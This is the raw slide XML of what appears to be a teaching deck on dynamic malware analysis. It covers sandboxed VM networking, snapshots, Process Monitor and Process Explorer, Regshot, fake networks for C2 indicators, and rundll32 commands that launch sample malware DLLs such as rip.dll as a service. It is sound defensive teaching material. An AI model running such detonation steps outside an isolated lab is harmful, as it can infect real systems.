            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:l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431542" y="3219146"/>
            <a:ext cx="4302477" cy="3522221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:l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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="1770474"/>
            <a:ext cx="2232214" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Host-only Networking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6754328" y="3412672"/>
            <a:ext cx="2147126" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Custom Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMNet0: Bridging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>VMNet8: NAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10544202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a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="3034680" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Snapshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Restore points</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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90" y="1700807"/>
            <a:ext cx="5507352" cy="453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9155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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Techniques and tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sandbox: Norman, GFI, Anubis, Joe, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Process Monitor/Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Regshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ApateDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>InetSim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: Linux-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2052736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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Running Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Double-click: EXE, DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Apply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>rundll32.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Export arguments: by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>PE Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>rip.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(export : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Uninstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>; ipr32x.dll  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(export: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="2837885"/>
            <a:ext cx="5250155" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DLLname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Export arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051720" y="5200847"/>
            <a:ext cx="4608512" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rip.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074550" y="5877272"/>
            <a:ext cx="6025841" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\rundll32.exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ipr32xdll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>InstallService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\net start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ServiceName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" i="1" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1440766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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Process Monitoring (procmon.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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68" y="1700808"/>
            <a:ext cx="7994912" cy="4909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07358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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Process Monitoring –&gt; Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common functions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RegSetValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Important fields: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Process Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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717648"/>
            <a:ext cx="6268292" cy="4071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02532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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Explorer (procexp.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Company</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>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800191"/>
            <a:ext cx="6810524" cy="4600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82876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a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="4546848" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Explorer -&gt; Verify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MS uses digital signatures for most of its core executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Malware often replaces authentic Windows files with its own in an attempt to hide</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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193673"/>
            <a:ext cx="4044500" cy="511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11248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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Process Explorer -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Compare Strings </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Compare strings contained in the disk executables (images)against strings in memory to recognize the replacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>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958608"/>
            <a:ext cx="5832648" cy="3573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4355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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malicious code/Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>code that is capable of causing harm to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> of code or data, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>computing system encompasses including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>irus, Trojan horse, worm, rootkit, scareware, spyware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>set of instructions that run on your computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>your system do something that an attacker wants it to do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17756570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068960"/>
            <a:ext cx="8010525"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a:t>Dynamic Malware Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Comparing Registry snapshots by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Regshot</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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449" y="1792501"/>
            <a:ext cx="4281292" cy="43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52602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Faking a Network</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sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Malware often beacons out and eventually communicates with a command-and-control server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>A fake network allows us to obtain network indicators (DNS names, IP, packet signatures) without connecting to the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Some malware can realise that it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>executing in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>virtualized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>environment (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
